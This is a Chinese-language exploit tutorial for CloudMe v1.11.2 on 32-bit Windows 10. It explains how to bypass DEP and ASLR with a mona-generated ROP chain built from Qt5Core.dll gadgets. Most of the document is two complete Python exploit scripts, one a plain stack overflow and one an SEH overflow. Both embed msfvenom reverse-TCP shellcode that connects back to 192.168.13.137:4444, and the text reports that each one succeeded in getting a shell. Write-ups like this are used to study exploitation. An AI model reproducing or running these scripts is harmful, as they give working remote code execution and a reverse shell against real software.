CloudMe v1.11.2 DEP and ASLR bypass using ROP gadgets

测试环境：Windows 10 21H2 32位，开启全局DEP。这里来看如何绕过DEP和ASLR。附带演示一下基于SEH栈溢出DEP bypass与普通SEH栈溢出利用代码结构的不同。

普通栈溢出利用：

这个程序可以用普通的栈溢出DEP bypass来完成利用。此时Offset为1052。太简单了，就不过多解释了。

查找未开启ASLR的DLL，并查找RETN：

0:014> .load pykd.pyd
0:014> !py mona noaslr

0:014> !py mona find -type instr -s "retn" -p 10 -o -m Qt5Core.dll

来看一下最终的利用代码：

import sys
import socket
import struct

target="127.0.0.1"

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.13.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00'

shellcode =  b""
shellcode += b"\xb8\x26\xe9\x79\xbf\xdb\xdc\xd9\x74\x24\xf4"
shellcode += b"\x5e\x33\xc9\xb1\x52\x31\x46\x12\x83\xee\xfc"
shellcode += b"\x03\x60\xe7\x9b\x4a\x90\x1f\xd9\xb5\x68\xe0"
shellcode += b"\xbe\x3c\x8d\xd1\xfe\x5b\xc6\x42\xcf\x28\x8a"
shellcode += b"\x6e\xa4\x7d\x3e\xe4\xc8\xa9\x31\x4d\x66\x8c"
shellcode += b"\x7c\x4e\xdb\xec\x1f\xcc\x26\x21\xff\xed\xe8"
shellcode += b"\x34\xfe\x2a\x14\xb4\x52\xe2\x52\x6b\x42\x87"
shellcode += b"\x2f\xb0\xe9\xdb\xbe\xb0\x0e\xab\xc1\x91\x81"
shellcode += b"\xa7\x9b\x31\x20\x6b\x90\x7b\x3a\x68\x9d\x32"
shellcode += b"\xb1\x5a\x69\xc5\x13\x93\x92\x6a\x5a\x1b\x61"
shellcode += b"\x72\x9b\x9c\x9a\x01\xd5\xde\x27\x12\x22\x9c"
shellcode += b"\xf3\x97\xb0\x06\x77\x0f\x1c\xb6\x54\xd6\xd7"
shellcode += b"\xb4\x11\x9c\xbf\xd8\xa4\x71\xb4\xe5\x2d\x74"
shellcode += b"\x1a\x6c\x75\x53\xbe\x34\x2d\xfa\xe7\x90\x80"
shellcode += b"\x03\xf7\x7a\x7c\xa6\x7c\x96\x69\xdb\xdf\xff"
shellcode += b"\x5e\xd6\xdf\xff\xc8\x61\xac\xcd\x57\xda\x3a"
shellcode += b"\x7e\x1f\xc4\xbd\x81\x0a\xb0\x51\x7c\xb5\xc1"
shellcode += b"\x78\xbb\xe1\x91\x12\x6a\x8a\x79\xe2\x93\x5f"
shellcode += b"\x2d\xb2\x3b\x30\x8e\x62\xfc\xe0\x66\x68\xf3"
shellcode += b"\xdf\x97\x93\xd9\x77\x3d\x6e\x8a\xb7\x6a\x7d"
shellcode += b"\xc3\x50\x69\x7d\xc2\xfc\xe4\x9b\x8e\xec\xa0"
shellcode += b"\x34\x27\x94\xe8\xce\xd6\x59\x27\xab\xd9\xd2"
shellcode += b"\xc4\x4c\x97\x12\xa0\x5e\x40\xd3\xff\x3c\xc7"
shellcode += b"\xec\xd5\x28\x8b\x7f\xb2\xa8\xc2\x63\x6d\xff"
shellcode += b"\x83\x52\x64\x95\x39\xcc\xde\x8b\xc3\x88\x19"
shellcode += b"\x0f\x18\x69\xa7\x8e\xed\xd5\x83\x80\x2b\xd5"
shellcode += b"\x8f\xf4\xe3\x80\x59\xa2\x45\x7b\x28\x1c\x1c"
shellcode += b"\xd0\xe2\xc8\xd9\x1a\x35\x8e\xe5\x76\xc3\x6e"
shellcode += b"\x57\x2f\x92\x91\x58\xa7\x12\xea\x84\x57\xdc"
shellcode += b"\x21\x0d\x77\x3f\xe3\x78\x10\xe6\x66\xc1\x7d"
shellcode += b"\x19\x5d\x06\x78\x9a\x57\xf7\x7f\x82\x12\xf2"
shellcode += b"\xc4\x04\xcf\x8e\x55\xe1\xef\x3d\x55\x20"


def create_rop_chain():

  # rop chain generated with mona.py - www.corelan.be
  rop_gadgets = [
    #[---INFO:gadgets_to_set_ebp:---]
    0x68c50d64,  # POP EBP # RETN [Qt5Core.dll]
    0x68c50d64,  # skip 4 bytes [Qt5Core.dll]
    #[---INFO:gadgets_to_set_ebx:---]
    0x68fa7ca2,  # POP EDX # RETN [Qt5Core.dll]
    0xfffffdff,  # Value to negate, will become 0x00000201
    0x68bd5fe4,  # NEG EDX # RETN 0x0C [Qt5Core.dll]
    0x68d773fe,  # POP EBX # RETN [Qt5Core.dll]
    0x41414141,  # Filler (RETN offset compensation)
    0x41414141,  # Filler (RETN offset compensation)
    0x41414141,  # Filler (RETN offset compensation)
    0xffffffff,  #
    0x68fb3ef1,  # INC EBX # RETN [Qt5Core.dll]
    0x68f8063c,  # ADD EBX,EDX # ADD AL,0A # RETN [Qt5Core.dll]
    #[---INFO:gadgets_to_set_edx:---]
    0x68f9a472,  # POP EDX # RETN [Qt5Core.dll]
    0xffffffc0,  # Value to negate, will become 0x00000040
    0x68bd5fe4,  # NEG EDX # RETN 0x0C [Qt5Core.dll]
    #[---INFO:gadgets_to_set_ecx:---]
    0x68ae7e17,  # POP ECX # RETN [Qt5Core.dll]
    0x41414141,  # Filler (RETN offset compensation)
    0x41414141,  # Filler (RETN offset compensation)
    0x41414141,  # Filler (RETN offset compensation)
    0x68c13baa,  # &Writable location [Qt5Core.dll]
    #[---INFO:gadgets_to_set_edi:---]
    0x68c018b6,  # POP EDI # RETN [Qt5Core.dll]
    0x68cef5b4,  # RETN (ROP NOP) [Qt5Core.dll]
    #[---INFO:gadgets_to_set_esi:---]
    0x68d54786,  # POP ESI # RETN [Qt5Core.dll]
    0x68a9314e,  # JMP [EAX] [Qt5Core.dll]
    0x68b226c5,  # POP EAX # RETN [Qt5Core.dll]
    0x690398a8,  # ptr to &VirtualProtect() [IAT Qt5Core.dll]
    #[---INFO:pushad:---]
    0x68fd02fb,  # PUSHAD # RETN [Qt5Core.dll]
    #[---INFO:extras:---]
    0x68aa11e6,  # ptr to 'push esp # ret ' [Qt5Core.dll]
  ]
  return b''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()



buff_size = 4000
junk = b'A'*1052
retn = struct.pack("<L",0x68c1f01c)   # 0x68c1f01c : retn
nops = b"\x90"*32
junk2 = b'C'*(buff_size-1052-len(shellcode)-32)
payload = junk+retn+rop_chain+nops+shellcode+junk2

try:
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target,8888))
    s.send(payload)
except Exception as e:
    print(e)

利用mona自动生成的ROP Chain，所使用的Qt5Core.dll没有开启ASLR，所以这里采用的选择未开启ASLR的DLL来bypass ASLR。

成功反弹shell：

SEH栈溢出利用：

触发SEH栈溢出Offset为2348，注意这里是指覆盖Next SEH而不是SEH Handler。按照普通SEH栈溢出漏洞利用，P/P/R配合JMP，来一下出现的问题：

P/P/R处下断点，异常发生之后，进入P/P/R：

想要执行JMP指令，因为DEP的存在，执行失败：

结合前一篇文章介绍，这里需要一条能够跳转到ROP Chain的指令覆盖SEH Handler，上一篇文章介绍的比较详细，这里给出最后的利用脚本：

import sys
import socket
import struct

target="127.0.0.1"

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.13.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00'

shellcode =  b""
shellcode += b"\xda\xd9\xd9\x74\x24\xf4\xba\xc2\x93\x9a\x62"
shellcode += b"\x58\x33\xc9\xb1\x52\x83\xe8\xfc\x31\x50\x13"
shellcode += b"\x03\x92\x80\x78\x97\xee\x4f\xfe\x58\x0e\x90"
shellcode += b"\x9f\xd1\xeb\xa1\x9f\x86\x78\x91\x2f\xcc\x2c"
shellcode += b"\x1e\xdb\x80\xc4\x95\xa9\x0c\xeb\x1e\x07\x6b"
shellcode += b"\xc2\x9f\x34\x4f\x45\x1c\x47\x9c\xa5\x1d\x88"
shellcode += b"\xd1\xa4\x5a\xf5\x18\xf4\x33\x71\x8e\xe8\x30"
shellcode += b"\xcf\x13\x83\x0b\xc1\x13\x70\xdb\xe0\x32\x27"
shellcode += b"\x57\xbb\x94\xc6\xb4\xb7\x9c\xd0\xd9\xf2\x57"
shellcode += b"\x6b\x29\x88\x69\xbd\x63\x71\xc5\x80\x4b\x80"
shellcode += b"\x17\xc5\x6c\x7b\x62\x3f\x8f\x06\x75\x84\xed"
shellcode += b"\xdc\xf0\x1e\x55\x96\xa3\xfa\x67\x7b\x35\x89"
shellcode += b"\x64\x30\x31\xd5\x68\xc7\x96\x6e\x94\x4c\x19"
shellcode += b"\xa0\x1c\x16\x3e\x64\x44\xcc\x5f\x3d\x20\xa3"
shellcode += b"\x60\x5d\x8b\x1c\xc5\x16\x26\x48\x74\x75\x2f"
shellcode += b"\xbd\xb5\x85\xaf\xa9\xce\xf6\x9d\x76\x65\x90"
shellcode += b"\xad\xff\xa3\x67\xd1\xd5\x14\xf7\x2c\xd6\x64"
shellcode += b"\xde\xea\x82\x34\x48\xda\xaa\xde\x88\xe3\x7e"
shellcode += b"\x70\xd8\x4b\xd1\x31\x88\x2b\x81\xd9\xc2\xa3"
shellcode += b"\xfe\xfa\xed\x69\x97\x91\x14\xfa\x58\xcd\x1b"
shellcode += b"\x73\x30\x0c\x23\x92\x9d\x99\xc5\xfe\x0d\xcc"
shellcode += b"\x5e\x97\xb4\x55\x14\x06\x38\x40\x51\x08\xb2"
shellcode += b"\x67\xa6\xc7\x33\x0d\xb4\xb0\xb3\x58\xe6\x17"
shellcode += b"\xcb\x76\x8e\xf4\x5e\x1d\x4e\x72\x43\x8a\x19"
shellcode += b"\xd3\xb5\xc3\xcf\xc9\xec\x7d\xed\x13\x68\x45"
shellcode += b"\xb5\xcf\x49\x48\x34\x9d\xf6\x6e\x26\x5b\xf6"
shellcode += b"\x2a\x12\x33\xa1\xe4\xcc\xf5\x1b\x47\xa6\xaf"
shellcode += b"\xf0\x01\x2e\x29\x3b\x92\x28\x36\x16\x64\xd4"
shellcode += b"\x87\xcf\x31\xeb\x28\x98\xb5\x94\x54\x38\x39"
shellcode += b"\x4f\xdd\x58\xd8\x45\x28\xf1\x45\x0c\x91\x9c"
shellcode += b"\x75\xfb\xd6\x98\xf5\x09\xa7\x5e\xe5\x78\xa2"
shellcode += b"\x1b\xa1\x91\xde\x34\x44\x95\x4d\x34\x4d"





def create_rop_chain():

	# rop chain generated with mona.py - www.corelan.be
	rop_gadgets = [
	#[---INFO:gadgets_to_set_ebp:---]
	0x68c50d64,  # POP EBP # RETN [Qt5Core.dll]
	0x41414141,  # junk
	0x68c50d64,  # skip 4 bytes [Qt5Core.dll]
	#[---INFO:gadgets_to_set_ebx:---]
	0x68fa7ca2,  # POP EDX # RETN [Qt5Core.dll]
	0xfffffdff,  # Value to negate, will become 0x00000201
	0x68bd5fe4,  # NEG EDX # RETN 0x0C [Qt5Core.dll]
	0x68d773fe,  # POP EBX # RETN [Qt5Core.dll]
	0x41414141,  # Filler (RETN offset compensation)
	0x41414141,  # Filler (RETN offset compensation)
	0x41414141,  # Filler (RETN offset compensation)
	0xffffffff,  #
	0x68fb3ef1,  # INC EBX # RETN [Qt5Core.dll]
	0x68f8063c,  # ADD EBX,EDX # ADD AL,0A # RETN [Qt5Core.dll]
	#[---INFO:gadgets_to_set_edx:---]
	0x68f9a472,  # POP EDX # RETN [Qt5Core.dll]
	0xffffffc0,  # Value to negate, will become 0x00000040
	0x68bd5fe4,  # NEG EDX # RETN 0x0C [Qt5Core.dll]
	#[---INFO:gadgets_to_set_ecx:---]
	0x68ae7e17,  # POP ECX # RETN [Qt5Core.dll]
	0x41414141,  # Filler (RETN offset compensation)
	0x41414141,  # Filler (RETN offset compensation)
	0x41414141,  # Filler (RETN offset compensation)
	0x68c13baa,  # &Writable location [Qt5Core.dll]
	#[---INFO:gadgets_to_set_edi:---]
	0x68c018b6,  # POP EDI # RETN [Qt5Core.dll]
	0x68cef5b4,  # RETN (ROP NOP) [Qt5Core.dll]
	#[---INFO:gadgets_to_set_esi:---]
	0x68d54786,  # POP ESI # RETN [Qt5Core.dll]
	0x68a9314e,  # JMP [EAX] [Qt5Core.dll]
	0x68b226c5,  # POP EAX # RETN [Qt5Core.dll]
	0x690398a8,  # ptr to &VirtualProtect() [IAT Qt5Core.dll]
	#[---INFO:pushad:---]
	0x68fd02fb,  # PUSHAD # RETN [Qt5Core.dll]
	#[---INFO:extras:---]
	0x68aa11e6,  # ptr to 'push esp # ret ' [Qt5Core.dll]
	]
	return b''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()



buff_size = 4000
#junk = b'A'*2348
#nseh = b"\xeb\x06\x90\x90"
junk = b'A'*2352
#seh = struct.pack("<L",0x68a9528e)  #0x68a9528e : pop esi # pop edi # ret
seh = struct.pack("<L",0x68b72608) #0x68b72608 : {pivot 4156 / 0x103c} :  # ADD ESP,102C # POP EBX # POP ESI # POP EDI # POP EBP # RETN 0x04
nops = b"\x90"*32
nops2 = b"\x90"*1480
junk1 = b"\x41"*16  
junk2 = b'C'*(buff_size-2352-4-len(shellcode)-len(nops)-len(nops2))
#payload = junk+nseh+seh+retn+rop_chain+nops+shellcode+junk2
payload = junk+seh+nops2+junk1+rop_chain+nops+shellcode+junk2

try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,8888))
	s.send(payload)
except Exception as e:
	print(e)

成功反弹shell：

参考：

1.https://xen0vas.github.io/cloudme-v1-11-2-dep-bypass-using-rop-gadgets/#